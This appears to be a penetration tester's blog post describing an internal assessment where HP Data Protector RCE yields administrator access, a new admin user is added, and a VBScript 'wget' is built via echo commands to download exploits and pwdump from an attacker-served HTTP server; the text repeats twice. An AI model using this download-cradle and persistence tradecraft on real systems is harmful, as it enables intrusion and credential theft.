Wget For Windows
Pentesting in , different environments, brings in various challenges. I would like to share my experience with a recent internal network assessment, the challenges I faced and how I was able to get over.
So as usual the pentest started with scanning the various networks. Apart from a few Cisco default credentials, there was nothing more in the environment that could give me something juicy. Finally one of my scans revealed that a few of the systems was vulnerable to the HP Data Protector Remote Code execution. Thank you Lord!!!

I quickly fired up metasploit and used a meterpreter payload and NOTHING!!.. Not to worry.

Wget For Windows

Pentesting in , different environments, brings in various challenges. I would like to share my experience with a recent internal network assessment, the challenges I faced and how I was able to get over.
So as usual the pentest started with scanning the various networks. Apart from a few Cisco default credentials, there was nothing more in the environment that could give me something juicy. Finally one of my scans revealed that a few of the systems was vulnerable to the HP Data Protector Remote Code execution. Thank you Lord!!!

I quickly fired up metasploit and used a meterpreter payload and NOTHING!!.. Not to worry.

"If you don’t have it create it
I downloaded the python exploit from exploit-db and boom RCE.
Next I checked the privileges this service was running with. Administrator ☺
Made user on the system and added the user to the administrators group and the Remote Desktop Users group.
Now that I was in the box I wanted to dump the passwords using pwdump.exe , but for some reason copy and paste wasn’t working. Now there are two ways to go about this problem and both involve using our attacking machine as a server.
I always use “python –m SimpleHTTPServer 80” to serve my exploits. So I opened the browser to connect to my attacking machine. The browser wouldn’t connect to my machine.
Now a linux box comes with various command line browsers/tools like curl, wget, fetch, scp. Someone famous once said “ If you don’t have it create it”. Create our own wget on windows.

 

echo strUrl = WScript.Arguments.Item(0) > wget.vbs

echo StrFile = WScript.Arguments.Item(1) >> wget.vbs

echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs

echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs

echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs

echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs

echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs

echo Err.Clear >> wget.vbs

echo Set http = Nothing >> wget.vbs

echo Set http = CreateObject(“WinHttp.WinHttpRequest.5.1”) >> wget.vbs

echo If http Is Nothing Then Set http = CreateObject(“WinHttp.WinHttpRequest”) >> wget.vbs

echo If http Is Nothing Then Set http = CreateObject(“MSXML2.ServerXMLHTTP”) >> wget.vbs

echo If http Is Nothing Then Set http = CreateObject(“Microsoft.XMLHTTP”) >> wget.vbs

echo http.Open “GET”, strURL, False >> wget.vbs

echo http.Send >> wget.vbs

echo varByteArray = http.ResponseBody >> wget.vbs

echo Set http = Nothing >> wget.vbs

echo Set fs = CreateObject(“Scripting.FileSystemObject”) >> wget.vbs

echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs

echo strData = “” >> wget.vbs

echo strBuffer = “” >> wget.vbs

echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs

echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs

echo Next >> wget.vbs

echo ts.Close >> wget.vbs

 

Now that your have your own wget you can get over the restrictions put on the browser to download all the exploits you want. ☺

Happy Hacking ☺

"If you don’t have it create it

I downloaded the python exploit from exploit-db and boom RCE.
Next I checked the privileges this service was running with. Administrator ☺
Made user on the system and added the user to the administrators group and the Remote Desktop Users group.
Now that I was in the box I wanted to dump the passwords using pwdump.exe , but for some reason copy and paste wasn’t working. Now there are two ways to go about this problem and both involve using our attacking machine as a server.
I always use “python –m SimpleHTTPServer 80” to serve my exploits. So I opened the browser to connect to my attacking machine. The browser wouldn’t connect to my machine.
Now a linux box comes with various command line browsers/tools like curl, wget, fetch, scp. Someone famous once said “ If you don’t have it create it”. Create our own wget on windows.

echo strUrl = WScript.Arguments.Item(0) > wget.vbs

echo StrFile = WScript.Arguments.Item(1) >> wget.vbs

echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs

echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs

echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs

echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs

echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs

echo Err.Clear >> wget.vbs

echo Set http = Nothing >> wget.vbs

echo Set http = CreateObject(“WinHttp.WinHttpRequest.5.1”) >> wget.vbs

echo If http Is Nothing Then Set http = CreateObject(“WinHttp.WinHttpRequest”) >> wget.vbs

echo If http Is Nothing Then Set http = CreateObject(“MSXML2.ServerXMLHTTP”) >> wget.vbs

echo If http Is Nothing Then Set http = CreateObject(“Microsoft.XMLHTTP”) >> wget.vbs

echo http.Open “GET”, strURL, False >> wget.vbs

echo http.Send >> wget.vbs

echo varByteArray = http.ResponseBody >> wget.vbs

echo Set http = Nothing >> wget.vbs

echo Set fs = CreateObject(“Scripting.FileSystemObject”) >> wget.vbs

echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs

echo strData = “” >> wget.vbs

echo strBuffer = “” >> wget.vbs

echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs

echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs

echo Next >> wget.vbs

echo ts.Close >> wget.vbs

Now that your have your own wget you can get over the restrictions put on the browser to download all the exploits you want. ☺

Happy Hacking ☺